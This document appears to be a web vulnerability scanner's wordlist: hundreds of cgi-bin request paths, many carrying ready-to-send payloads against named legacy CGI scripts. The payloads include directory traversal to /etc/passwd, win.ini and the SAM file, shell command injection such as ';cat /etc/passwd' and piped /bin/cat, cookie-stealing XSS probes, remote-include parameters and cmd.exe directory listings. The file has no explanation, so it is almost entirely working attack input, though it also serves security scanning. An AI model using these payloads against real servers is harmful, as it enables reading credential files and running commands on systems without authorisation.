cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
cgi-bin/FormMail.cgi?<script>alert(\"Vulnerable\");</script>
cgi-bin/GW5/GWWEB.EXE
cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
cgi-bin/GWWEB.EXE?HELP=bad-request
cgi-bin/ImageFolio/admin/admin.cgi
cgi-bin/MachineInfo
cgi-bin/MsmMask.exe
cgi-bin/MsmMask.exe?mask=/junk334
cgi-bin/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
cgi-bin/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
cgi-bin/Pbcgi.exe
cgi-bin/SGB_DIR/superguestconfig
cgi-bin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
cgi-bin/Upload.pl
cgi-bin/VsSetCookie.exe?
cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%
cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\
cgi-bin/WS_FTP.ini
cgi-bin/Webnews.exe
cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
cgi-bin/add_ftp.cgi
cgi-bin/addbanner.cgi
cgi-bin/adduser.cgi
cgi-bin/admin.cgi
cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
cgi-bin/admin.php
cgi-bin/admin.php3
cgi-bin/admin.pl
cgi-bin/admin/admin.cgi
cgi-bin/admin/setup.cgi
cgi-bin/adminhot.cgi
cgi-bin/adminwww.cgi
cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
cgi-bin/aglimpse
cgi-bin/aglimpse.cgi
cgi-bin/alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
cgi-bin/amadmin.pl
cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah
cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah
cgi-bin/anyboard.cgi
cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
cgi-bin/archie
cgi-bin/architext_query.cgi
cgi-bin/architext_query.pl
cgi-bin/ash
cgi-bin/astrocam.cgi
cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
cgi-bin/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
cgi-bin/auctiondeluxe/auction.pl
cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
cgi-bin/auth_data/auth_user_file.txt
cgi-bin/awl/auctionweaver.pl
cgi-bin/awstats.pl
cgi-bin/awstats/awstats.pl
cgi-bin/ax-admin.cgi
cgi-bin/ax.cgi
cgi-bin/axs.cgi
cgi-bin/badmin.cgi
cgi-bin/banner.cgi
cgi-bin/bannereditor.cgi
cgi-bin/bash
cgi-bin/bb-ack.sh
cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
cgi-bin/bb-histlog.sh
cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
cgi-bin/bb-rep.sh
cgi-bin/bb-replog.sh
cgi-bin/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
cgi-bin/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
cgi-bin/bbs_forum.cgi
cgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;
cgi-bin/bigconf.cgi
cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
cgi-bin/bizdb1-search.cgi
cgi-bin/blog/
cgi-bin/blog/mt-check.cgi
cgi-bin/blog/mt-load.cgi
cgi-bin/blog/mt.cfg
cgi-bin/bnbform
cgi-bin/bnbform.cgi
cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
cgi-bin/boozt/admin/index.cgi?section=5&input=1
cgi-bin/bsguest.cgi?email=x;ls
cgi-bin/bslist.cgi?email=x;ls
cgi-bin/build.cgi
cgi-bin/bulk/bulk.cgi
cgi-bin/c32web.exe/ChangeAdminPassword
cgi-bin/c_download.cgi
cgi-bin/cached_feed.cgi
cgi-bin/cachemgr.cgi
cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
cgi-bin/calendar
cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
cgi-bin/calendar.pl
cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
cgi-bin/calendar/index.cgi
cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd|
cgi-bin/calender_admin.pl
cgi-bin/campas?%0acat%0a/etc/passwd%0a
cgi-bin/cart.pl
cgi-bin/cart.pl?db='
cgi-bin/cartmanager.cgi
cgi-bin/cbmc/forums.cgi
cgi-bin/ccbill-local.cgi?cmd=MENU
cgi-bin/ccbill-local.pl?cmd=MENU
cgi-bin/cfgwiz.exe
cgi-bin/cgforum.cgi
cgi-bin/cgi-lib.pl
cgi-bin/cgi-test.exe
cgi-bin/cgi_process
cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
cgi-bin/cgicso?query=AAA
cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
cgi-bin/cgimail.exe
cgi-bin/cgitest.exe
cgi-bin/cgiwrap
cgi-bin/cgiwrap/%3Cfont%20color=red%3E
cgi-bin/cgiwrap/~@USERS
cgi-bin/cgiwrap/~JUNK(5)
cgi-bin/cgiwrap/~root
cgi-bin/change-your-password.pl
cgi-bin/classifieds
cgi-bin/classifieds.cgi
cgi-bin/classifieds/classifieds.cgi
cgi-bin/classifieds/index.cgi
cgi-bin/clickcount.pl?view=test
cgi-bin/clickresponder.pl
cgi-bin/cmd.exe?/c+dir
cgi-bin/cmd1.exe?/c+dir
cgi-bin/code.php
cgi-bin/code.php3
cgi-bin/com5...................................................................................................................................................................................................
cgi-bin/com5.java
cgi-bin/com5.pl
cgi-bin/commandit.cgi
cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
cgi-bin/common/listrec.pl
cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
cgi-bin/compatible.cgi
cgi-bin/contents.htm
cgi-bin/count.cgi
cgi-bin/counter-ord
cgi-bin/counterbanner
cgi-bin/counterbanner-ord
cgi-bin/counterfiglet-ord
cgi-bin/counterfiglet/nc/
cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csNews.cgi
cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csPassword.cgi
cgi-bin/csPassword/csPassword.cgi
cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
cgi-bin/csh
cgi-bin/cstat.pl
cgi-bin/cutecast/members/
cgi-bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
cgi-bin/cvslog.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cgi-bin/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>
cgi-bin/dasp/fm_shell.asp
cgi-bin/data/fetch.php?page=
cgi-bin/date
cgi-bin/day5datacopier.cgi
cgi-bin/day5datanotifier.cgi
cgi-bin/db2www/library/document.d2w/show
cgi-bin/db4web_c/dbdirname//etc/passwd
cgi-bin/db_manager.cgi
cgi-bin/dbman/db.cgi?db=no-db
cgi-bin/dbmlparser.exe
cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
cgi-bin/dcshop/auth_data/auth_user_file.txt
cgi-bin/dcshop/orders/orders.txt
cgi-bin/dfire.cgi
cgi-bin/diagnose.cgi
cgi-bin/dig.cgi
cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
cgi-bin/displayTC.pl
cgi-bin/dnewsweb
cgi-bin/donothing
cgi-bin/dose.pl?daily&somefile.txt&|ls|
cgi-bin/dumpenv.pl
cgi-bin/echo.bat
cgi-bin/echo.bat?&dir+c:\
cgi-bin/edit.pl
cgi-bin/empower?DB=whateverwhatever
cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/enter.cgi
cgi-bin/environ.cgi
cgi-bin/environ.pl
cgi-bin/environ.pl?param1=<script>alert(document.cookie)</script>
cgi-bin/erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
cgi-bin/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
cgi-bin/eshop.pl/seite=;cat%20eshop.pl|
cgi-bin/ex-logger.pl
cgi-bin/excite
cgi-bin/excite;IFS=\"$\";/bin/cat
cgi-bin/ezadmin.cgi
cgi-bin/ezboard.cgi
cgi-bin/ezman.cgi
cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
cgi-bin/ezshopper2/loadpage.cgi
cgi-bin/ezshopper3/loadpage.cgi
cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
cgi-bin/faxsurvey?cat%20/etc/passwd
cgi-bin/filemail
cgi-bin/filemail.pl
cgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable
cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/formmail.pl
cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/fortune
cgi-bin/foxweb.dll
cgi-bin/foxweb.exe
cgi-bin/fpadmin.htm
cgi-bin/fpremadm.exe
cgi-bin/fpsrvadm.exe
cgi-bin/ftp.pl
cgi-bin/ftpsh
cgi-bin/gH.cgi
cgi-bin/gbadmin.cgi?action=change_adminpass
cgi-bin/gbadmin.cgi?action=change_automail
cgi-bin/gbadmin.cgi?action=colors
cgi-bin/gbadmin.cgi?action=setup
cgi-bin/gbook/gbook.cgi?_MAILTO=xx;ls
cgi-bin/gbpass.pl
cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
cgi-bin/getdoc.cgi
cgi-bin/gettransbitmap
cgi-bin/glimpse
cgi-bin/gm-cplog.cgi
cgi-bin/gm.cgi
cgi-bin/guestbook.cgi
cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
cgi-bin/guestbook.pl
cgi-bin/handler
cgi-bin/handler/netsonar;cat
cgi-bin/hello.bat?&dir+c:\
cgi-bin/hitview.cgi
cgi-bin/horde/test.php
cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html
cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
cgi-bin/htgrep?file=index.html&hdr=/etc/passwd
cgi-bin/htimage.exe
cgi-bin/htimage.exe/path/filename?2,2
cgi-bin/html2chtml.cgi
cgi-bin/html2wml.cgi
cgi-bin/htmlscript?../../../../../../../../../../etc/passwd
cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
cgi-bin/htsearch?-c/nonexistant
cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
cgi-bin/htsearch?exclude=%60/etc/passwd%60
cgi-bin/ibill.pm
cgi-bin/icat
cgi-bin/if/admin/nph-build.cgi
cgi-bin/ikonboard/help.cgi?
cgi-bin/imageFolio.cgi
cgi-bin/imagefolio/admin/admin.cgi
cgi-bin/imagemap
cgi-bin/imagemap.exe
cgi-bin/include/new-visitor.inc.php
cgi-bin/index.js0x70
cgi-bin/index.pl
cgi-bin/info2www
cgi-bin/infosrch.cgi
cgi-bin/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
cgi-bin/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
cgi-bin/ion-p.exe?page=c:\winnt\repair\sam
cgi-bin/ion-p?page=../../../../../etc/passwd
cgi-bin/jailshell
cgi-bin/jj
cgi-bin/journal.cgi?folder=journal.cgi%00
cgi-bin/ksh
cgi-bin/lastlines.cgi?process
cgi-bin/listrec.pl
cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
cgi-bin/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
cgi-bin/log-reader.cgi
cgi-bin/log/
cgi-bin/log/nether-log.pl?checkit
cgi-bin/login.cgi
cgi-bin/login.pl
cgi-bin/login.pl?course_id=\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
cgi-bin/logit.cgi
cgi-bin/logs.pl
cgi-bin/logs/
cgi-bin/logs/access_log
cgi-bin/logs/error_log
cgi-bin/lookwho.cgi
cgi-bin/ls
cgi-bin/magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd
cgi-bin/mail
cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
cgi-bin/mailform.exe
cgi-bin/mailit.pl
cgi-bin/maillist.cgi
cgi-bin/maillist.pl
cgi-bin/mailnews.cgi
cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
cgi-bin/main_menu.pl
cgi-bin/majordomo.pl
cgi-bin/man.sh
cgi-bin/man2html
cgi-bin/mastergate/search.cgi?search=0&search_on=all
cgi-bin/meta.pl
cgi-bin/mgrqcgi
cgi-bin/mini_logger.cgi
cgi-bin/minimal.exe
cgi-bin/mkilog.exe
cgi-bin/mkplog.exe
cgi-bin/mmstdod.cgi
cgi-bin/moin.cgi?test
cgi-bin/mojo/mojo.cgi
cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd
cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/mrtg.cgi?cfg=blah
cgi-bin/ms_proxy_auth_query/
cgi-bin/mt-static/
cgi-bin/mt-static/mt-check.cgi
cgi-bin/mt-static/mt-load.cgi
cgi-bin/mt-static/mt.cfg
cgi-bin/mt/
cgi-bin/mt/mt-check.cgi
cgi-bin/mt/mt-load.cgi
cgi-bin/mt/mt.cfg
cgi-bin/multihtml.pl?multi=/etc/passwd%00html
cgi-bin/musicqueue.cgi
cgi-bin/myguestbook.cgi?action=view
cgi-bin/namazu.cgi
cgi-bin/nbmember.cgi?cmd=list_all_users
cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a
cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK
cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
cgi-bin/netpad.cgi
cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd
cgi-bin/nimages.php
cgi-bin/nlog-smb.cgi
cgi-bin/nlog-smb.pl
cgi-bin/non-existent.pl
cgi-bin/noshell
cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/nph-error.pl
cgi-bin/nph-exploitscanget.cgi
cgi-bin/nph-maillist.pl
cgi-bin/nph-publish
cgi-bin/nph-publish.cgi
cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
cgi-bin/nph-test-cgi
cgi-bin/ntitar.pl
cgi-bin/opendir.php?/etc/passwd
cgi-bin/orders/orders.txt
cgi-bin/pagelog.cgi
cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd
cgi-bin/parse-file
cgi-bin/pass
cgi-bin/passwd
cgi-bin/passwd.txt
cgi-bin/password
cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
cgi-bin/perl
cgi-bin/perl.exe
cgi-bin/perl.exe?-v
cgi-bin/perl?-v
cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd
cgi-bin/phf
cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20
cgi-bin/photo/
cgi-bin/photo/manage.cgi
cgi-bin/php-cgi
cgi-bin/php.cgi?/etc/passwd
cgi-bin/plusmail
cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
cgi-bin/pollssi.cgi
cgi-bin/post-query
cgi-bin/post16.exe
cgi-bin/post32.exe|dir%20c:\
cgi-bin/post_query
cgi-bin/postcards.cgi
cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/ppdscgi.exe
cgi-bin/printenv
cgi-bin/printenv.tmp
cgi-bin/probecontrol.cgi?command=enable&username=cancer&password=killer
cgi-bin/processit.pl
cgi-bin/profile.cgi
cgi-bin/pu3.pl
cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
cgi-bin/query
cgi-bin/query?mss=%2e%2e/config
cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
cgi-bin/quikstore.cfg
cgi-bin/quizme.cgi
cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/ratlog.cgi
cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
cgi-bin/redirect
cgi-bin/register.cgi
cgi-bin/replicator/webpage.cgi/
cgi-bin/responder.cgi
cgi-bin/retrieve_password.pl
cgi-bin/rguest.exe
cgi-bin/rightfax/fuwww.dll/?
cgi-bin/rksh
cgi-bin/rmp_query
cgi-bin/robadmin.cgi
cgi-bin/robpoll.cgi
cgi-bin/rpm_query
cgi-bin/rsh
cgi-bin/rtm.log
cgi-bin/rwcgi60
cgi-bin/rwcgi60/showenv
cgi-bin/rwwwshell.pl
cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
cgi-bin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
cgi-bin/sbcgi/sitebuilder.cgi
cgi-bin/scoadminreg.cgi
cgi-bin/scripts/*%0a.pl
cgi-bin/scripts/slxweb.dll/getfile?type=Library&file=[invalid
cgi-bin/search
cgi-bin/search.cgi
cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
cgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>
cgi-bin/search.pl
cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>
cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
cgi-bin/sendform.cgi
cgi-bin/sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd
cgi-bin/sensepost.exe?/c+dir
cgi-bin/session/adminlogin
cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
cgi-bin/sh
cgi-bin/shop.cgi?page=../../../../../../../etc/passwd
cgi-bin/shop.pl/page=;cat%20shop.pl|
cgi-bin/shop/auth_data/auth_user_file.txt
cgi-bin/shop/orders/orders.txt
cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd
cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
cgi-bin/show.pl
cgi-bin/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
cgi-bin/showuser.cgi
cgi-bin/shtml.dll
cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd|
cgi-bin/simplestguest.cgi
cgi-bin/simplestmail.cgi
cgi-bin/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
cgi-bin/snorkerz.bat
cgi-bin/snorkerz.cmd
cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00
cgi-bin/spin_client.cgi?aaaaaaaa
cgi-bin/ss
cgi-bin/sscd_suncourier.pl
cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
cgi-bin/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
cgi-bin/stat.pl
cgi-bin/stat/
cgi-bin/stats-bin-p/reports/index.html
cgi-bin/stats.pl
cgi-bin/stats.prf
cgi-bin/stats/
cgi-bin/stats/statsbrowse.asp?filepath=c:\&Opt=3
cgi-bin/stats_old/
cgi-bin/statsconfig
cgi-bin/statusconfig.pl
cgi-bin/statview.pl
cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
cgi-bin/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>
cgi-bin/store/agora.cgi?page=whatever33.html
cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00
cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00
cgi-bin/survey
cgi-bin/survey.cgi
cgi-bin/sws/admin.html
cgi-bin/sws/manager.pl
cgi-bin/tablebuild.pl
cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
cgi-bin/tcsh
cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
cgi-bin/test-cgi
cgi-bin/test-cgi.bat
cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>
cgi-bin/test-cgi.tcl
cgi-bin/test-cgi?/*
cgi-bin/test-env
cgi-bin/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
cgi-bin/test.cgi
cgi-bin/test/test.cgi
cgi-bin/test2.pl?&lt;script&gt;alert('Vulnerable');&lt;/script&gt;
cgi-bin/testcgi.exe
cgi-bin/testcgi.exe?<script>alert(document.cookie)</script>
cgi-bin/testing_whatever
cgi-bin/texis.exe/junk
cgi-bin/texis/junk
cgi-bin/texis/phine
cgi-bin/textcounter.pl
cgi-bin/tidfinder.cgi
cgi-bin/tigvote.cgi
cgi-bin/title.cgi
cgi-bin/tpgnrock
cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/troops.cgi
cgi-bin/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
cgi-bin/ultraboard.cgi
cgi-bin/ultraboard.pl
cgi-bin/unlg1.1
cgi-bin/unlg1.2
cgi-bin/update.dpgs
cgi-bin/upload.cgi
cgi-bin/uptime
cgi-bin/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
cgi-bin/utm/admin
cgi-bin/utm/utm_stat
cgi-bin/view-source
cgi-bin/view-source?view-source
cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>
cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;
cgi-bin/viewlogs.pl
cgi-bin/viewsource?/etc/passwd
cgi-bin/viralator.cgi
cgi-bin/virgil.cgi
cgi-bin/visadmin.exe
cgi-bin/visitor.exe
cgi-bin/vote.cgi
cgi-bin/vpasswd.cgi
cgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>
cgi-bin/w3-msql
cgi-bin/w3-sql
cgi-bin/wais.pl
cgi-bin/way-board.cgi?db=/etc/passwd%00
cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00
cgi-bin/wconsole.dll
cgi-bin/webais
cgi-bin/webbbs.cgi
cgi-bin/webbbs.exe
cgi-bin/webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
cgi-bin/webdist.cgi
cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
cgi-bin/webdriver
cgi-bin/webfind.exe?keywords=01234567890123456789
cgi-bin/webgais
cgi-bin/webif.cgi
cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/webmap.cgi
cgi-bin/webnews.pl
cgi-bin/webplus.exe?about
cgi-bin/webplus?about
cgi-bin/webplus?script=../../../../../../../../../../etc/passwd
cgi-bin/websendmail
cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
cgi-bin/webutil.pl
cgi-bin/webutils.pl
cgi-bin/webwho.pl
cgi-bin/wguest.exe
cgi-bin/where.pl?sd=ls%20/etc
cgi-bin/whois.cgi?action=load&whois=%3Bid
cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
cgi-bin/windmail
cgi-bin/windmail.exe
cgi-bin/wrap
cgi-bin/ws_ftp.ini
cgi-bin/www-sql
cgi-bin/wwwadmin.pl
cgi-bin/wwwboard.cgi.cgi
cgi-bin/wwwboard.pl
cgi-bin/wwwstats.pl
cgi-bin/wwwthreads/3tvars.pm
cgi-bin/wwwthreads/w3tvars.pm
cgi-bin/wwwwais
cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00
cgi-bin/zsh
cgi-dos/args.bat
cgi-lib.pl
cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>
cgi-local/cgiemail-1.4/cgicso?query=AAA
